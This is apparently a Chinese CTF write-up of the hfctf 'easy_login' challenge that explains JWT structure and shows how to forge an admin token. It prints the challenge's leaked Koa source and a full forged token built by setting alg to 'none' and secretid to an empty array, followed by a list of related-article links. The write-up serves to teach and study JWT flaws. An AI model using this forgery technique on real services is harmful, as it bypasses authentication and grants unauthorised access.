从hfctf学习JWT伪造
本文作者:Ch3ng
easy_login
简单介绍一下什么是JWT
Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该token也可直接被用于认证,也可被加密。
实际像这么一段数据
这串数据以(.)作为分隔符分为三个部分,依次如下:
l Header
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 解码为 { "alg": "HS256", "typ": "JWT" }
alg属性表示签名的算法(algorithm),默认是 HMAC SHA256(写成 HS256);typ属性表示这个令牌(token)的类型(type),JWT 令牌统一写为JWT
l Payload
eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ
解码为
{ "sub": "1234567890", "name": "John Doe", "iat": 1516239022 }
JWT 规定了7个官方字段,供选用
iss (issuer):签发人
exp (expiration time):过期时间
sub (subject):主题
aud (audience):受众
nbf (Not Before):生效时间
iat (Issued At):签发时间
jti (JWT ID):编号
l Signature
Signature 部分是对前两部分的签名,防止数据篡改。
首先,需要指定一个密钥(secret)。这个密钥只有服务器才知道,不能泄露给用户。然后,使用 Header 里面指定的签名算法(默认是 HMAC SHA256),按照下面的公式产生签名。
HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret )
算出签名以后,把 Header、Payload、Signature 三个部分拼成一个字符串,每个部分之间用"点"(.)分隔,就可以返回给用户。
JWT安全问题一般有以下
1. 修改算法为none
2. 修改算法从RS256到HS256
3. 信息泄漏 密钥泄漏
4. 爆破密钥
首先是一个登录框,我们先注册一个账号admin123,admin123
看题目意思应该是想办法变成admin来登录
查看前端代码js/app.js
1./**
2. * 或许该用 koa-static 来处理静态文件
3. * 路径该怎么配置?不管了先填个根目录XD
4. */
5.
6.function login() {
7. const username = $("#username").val();
8. const password = $("#password").val();
9. const token = sessionStorage.getItem("token");
10. $.post("/api/login", {username, password, authorization:token})
11. .done(function(data) {
12. const {status} = data;
13. if(status) {
14. document.location = "/home";
15. }
16. })
17. .fail(function(xhr, textStatus, errorThrown) {
18. alert(xhr.responseJSON.message);
19. });
20.}
21.
22.function register() {
23. const username = $("#username").val();
24. const password = $("#password").val();
25. $.post("/api/register", {username, password})
26. .done(function(data) {
27. const { token } = data;
28. sessionStorage.setItem('token', token);
29. document.location = "/login";
30. })
31. .fail(function(xhr, textStatus, errorThrown) {
32. alert(xhr.responseJSON.message);
33. });
34.}
35.
36.function logout() {
37. $.get('/api/logout').done(function(data) {
38. const {status} = data;
39. if(status) {
40. document.location = '/login';
41. }
42. });
43.}
44.
45.function getflag() {
46. $.get('/api/flag').done(function(data) {
47. const {flag} = data;
48. $("#username").val(flag);
49. }).fail(function(xhr, textStatus, errorThrown) {
50. alert(xhr.responseJSON.message);
51. });
52.}
根据注释符提示可以发现存在源码泄露问题
接着发现了源码泄漏
访问app.js,controller.js,rest.js即可得到源代码
关键代码controllers/api.js
1.const crypto = require('crypto');
2.
3.const fs = require('fs')
4.
5.const jwt = require('jsonwebtoken')
6.
7.
8.const APIError = require('../rest').APIError;
9.
10.
11.module.exports = {
12.
13. 'POST /api/register': async (ctx, next) => {
14.
15. const {username, password} = ctx.request.body;
16.
17.
18. if(!username || username === 'admin'){
19.
20. throw new APIError('register error', 'wrong username');
21.
22. }
23.
24.
25. if(global.secrets.length > 100000) {
26.
27. global.secrets = [];
28.
29. }
30.
31.
32. const secret = crypto.randomBytes(18).toString('hex');
33.
34. const secretid = global.secrets.length;
35.
36. global.secrets.push(secret)
37.
38.
39. const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
40.
41.
42.
43. ctx.rest({
44.
45. token: token
46.
47. });
48.
49.
50. await next();
51.
52. },
53.
54.
55.
56. 'POST /api/login': async (ctx, next) => {
57.
58. const {username, password} = ctx.request.body;
59.
60.
61. if(!username || !password) {
62.
63. throw new APIError('login error', 'username or password is necessary');
64.
65. }
66.
67.
68.
69. const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;
70.
71.
72. const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
73.
74.
75.
76. console.log(sid)
77.
78.
79. if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
80.
81. throw new APIError('login error', 'no such secret id');
82.
83. }
84.
85.
86. const secret = global.secrets[sid];
87.
88.
89. const user = jwt.verify(token, secret, {algorithm: 'HS256'});
90.
91.
92. const status = username === user.username && password === user.password;
93.
94.
95. if(status) {
96.
97. ctx.session.username = username;
98.
99. }
100.
101.
102. ctx.rest({
103.
104. status
105.
106. });
107.
108.
109. await next();
110.
111. },
112.
113.
114. 'GET /api/flag': async (ctx, next) => {
115.
116. if(ctx.session.username !== 'admin'){
117.
118. throw new APIError('permission error', 'permission denied');
119.
120. }
121.
122.
123. const flag = fs.readFileSync('/flag').toString();
124.
125. ctx.rest({
126.
127. flag
128.
129. });
130.
131.
132. await next();
133.
134. },
135.
136.
137. 'GET /api/logout': async (ctx, next) => {
138.
139. ctx.session.username = null;
140.
141. ctx.rest({
142.
143. status: true
144.
145. })
146.
147. await next();
148.
149. }
150.
151.};
尝试注册,可以看到在注册的时候生成了一个token,并存在sessionStorage中
得到:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzZWNyZXRpZCI6MSwidXNlcm5hbWUiOiJhZG1pbjEyMyIsInBhc3N3b3JkIjoiYWRtaW4xMjMiLCJpYXQiOjE1ODczNzg4MjB9.o5ePpkaTQcSBxmOV-z6hBsWmvvbkd1a_C6Eu7Dpok4Q
解密得到:
token生成过程
1.const secret = crypto.randomBytes(18).toString('hex');
2.const secretid = global.secrets.length;
3.global.secrets.push(secret)
4.const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'}
看看各种条件,这里会先对sid进行验证,我们需要绕过这条认证,下面还有一个jwt.verify()的验证并赋值给user
1.const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
2.console.log(sid)
3.if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
4. throw new APIError('login error', 'no such secret id');
5.}
6.const secret = global.secrets[sid];
7.const user = jwt.verify(token, secret, {algorithm: 'HS256'});
8.const status = username === user.username && password === user.password;
9......
10.....
11.'GET /api/flag': async (ctx, next) => {
12. if(ctx.session.username !== 'admin'){
13. throw new APIError('permission error', 'permission denied');
14. }
这里的密钥是生成了18位,基本没有爆破的可能性,我们使用的方法是将算法(alg)设置为none,接着我们需要让jwt.verify()验证中的secret为空,这里有个tricks
再看看能不能过条件
const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
运行结果
1. > sid < secrets.length
2. true
3. > sid >= 0
4. true
我们将header修改
1. 原:
2. {
3. "alg": "HS256",
4. "typ": "JWT"
5. }
6. ===>
7. {
8. "alg": "none",
9. "typ": "JWT"
10. }
11. 并加密为
12. eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0
修改payload
1. {
2. "secretid": 1,
3. "username": "admin123",
4. "password": "admin123",
5. "iat": 1587378820
6. }
7. ===>
8. {
9. "secretid": [],
10. "username": "admin",
11. "password": "admin123",
12. "iat": 1587378820
13. }
14. 并加密为
15. eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6ImFkbWluMTIzIiwiaWF0IjoxNTg3Mzc4ODIwfQ
最后使用(.)进行拼接得到伪造的token
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6ImFkbWluMTIzIiwiaWF0IjoxNTg3Mzc4ODIwfQ.
修改sessionStorage
接着使用admin,admin123登录访问api/flag,即可得到flag
参考:
https://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html
从hfctf学习JWT伪造的更多相关文章
- [原题复现+审计][CISCN2019 华北赛区 Day1 Web2]ikun(逻辑漏洞、JWT伪造、python序列化)
简介 原题复现: 考察知识点:逻辑漏洞.JWT伪造.python反序列化 线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台 ...
- JWT伪造攻击
JWT修改伪造攻击 什么是JWT? JSON Web Token(JSON Web令牌)是一种跨域验证身份的方案.JWT不加密传输的数据,但能够通过数字签名来验证数据未被篡改(但是做完下面的WebGo ...
- 想全面理解JWT?一文足矣!
有篇关于JWT的文章,叫"JWT: The Complete Guide to JSON Web Tokens",写得全面细致.为了自己能更清晰理解并惠及更多人,我把它大致翻译了过 ...
- django restframework jwt
既然要来学习jwt(json web token),那么我们肯定是先要了解jwt的优势以及应用场景--跨域认证. $ pip install djangorestframework-jwt 传统coo ...
- JWT应用
调试器库简介问一件T恤! 精心制作 JSON Web令牌简介 新:免费获得JWT手册并深入学习JWT! 什么是JSON Web Token? JSON Web Token(JWT)是一个开放标准(RF ...
- 阶段5 3.微服务项目【学成在线】_day16 Spring Security Oauth2_11-SpringSecurityOauth2研究-JWT研究-JWT介绍
3.6 JWT研究 3.6.1 JWT介绍 在介绍JWT之前先看一下传统校验令牌的方法,如下图: 问题: 传统授权方法的问题是用户每次请求资源服务,资源服务都需要携带令牌访问认证服务去校验令牌的合法性 ...
- 服务安全-JWT(JSON Web Tokens):百科
ylbtech-服务安全-JWT(JSON Web Tokens):百科 JSON Web Tokens是一种开放的行业标准 RFC 7519方法,用于在双方之间安全地表示索赔. JWT.IO允许您解 ...
- Spring Boot JWT 快速入门
本章节讨论 jwt 在 spring boot 中的应用.意在快速入门 jwt. java jdk1.8 maven 3.2+ spring boot 2.0+ JSON Web Token(JWT) ...
- 从零玩转SpringSecurity+JWT整合前后端分离
从零玩转SpringSecurity+JWT整合前后端分离 2021年4月9日 · 预计阅读时间: 50 分钟 一.什么是Jwt? Json web token (JWT), 是为了在网络应用环境间传 ...
随机推荐
- Spring Cloud 系列之 Netflix Zuul 服务网关
什么是 Zuul Zuul 是从设备和网站到应用程序后端的所有请求的前门.作为边缘服务应用程序,Zuul 旨在实现动态路由,监视,弹性和安全性.Zuul 包含了对请求的路由和过滤两个最主要的功能. Z ...
- Hive架构原理
什么是Hive Hive是由Facebook开源用于解决海量结构化日志的数据统计:Hive是基于Hadoop的一个数据仓库工具,可以将结构化的数据文件映射 成一张表,并提供类SQL查询功能,底层计算引 ...
- 寻找一把进入 Alibaba Sentinel 的钥匙(文末附流程图)
经过前面几篇文章的铺垫,我们正式来探讨 Sentinel 的 entry 方法的实现流程.即探究进入 Alibaba Sentinel 核心的一把钥匙. @ 目录 1.SphU.entry 流程分析 ...
- flask前后端输出html页面(数组遍历)
通过flask,输出页面 后端代码文件:app.py 前端html文件:output.html 1.打开(app.py) 导入相关模块: 2.定义方法:(app.py) 3.写入与后端定义好的参数:( ...
- Python turtle库的应用——蛇
turtle库介绍 1.Turtle中的turtle.setup()函数用于启动一个图形窗口,它有四个参数 turtle.setup(width, height, startx, starty) 分别 ...
- Light of future-冲刺Day 2
目录 归属班级 →2019秋福大软件工程实践Z班 作业要求 →团队作业第五次-项目冲刺 团队名称 未来之光 这个作业的目标 第二天的冲刺总结 作业正文 →Light of future-冲刺Day 2 ...
- python_Mock基本使用
## 1.mock简介 1. py3已将mock集成到unittest库中 2. 为的就是更好的进行单元测试 3. 简单理解,模拟接口返回参数 4. 通俗易懂,直接修改接口返回参数的值 5. 官方文档 ...
- Tkinter布局管理器
Layout management in Tkinter 原英文教程地址:zetcode.com In this part of the Tkinter tutorial, we introduce ...
- win10无法使用VMwareWorkstation的解决办法
最近(2019-10)国庆期间,微软更新了一次win10. 此次更新导致很多同学的Workstation pro不能用了. 主要的解决办法有一下几种: 卸载最新的系统更新包 在控制面板>> ...
- 听说这个 IP 和子网掩码异常难算
IP地址格式 每个Internet主机或路由器都有IP地址.所有的IP地址包括网络号和主机号(就像是手机号,前几位是区号,后几位是序列号). 说明如下 A类地址用于主机数目非常多的网络.A类地址允许有 ...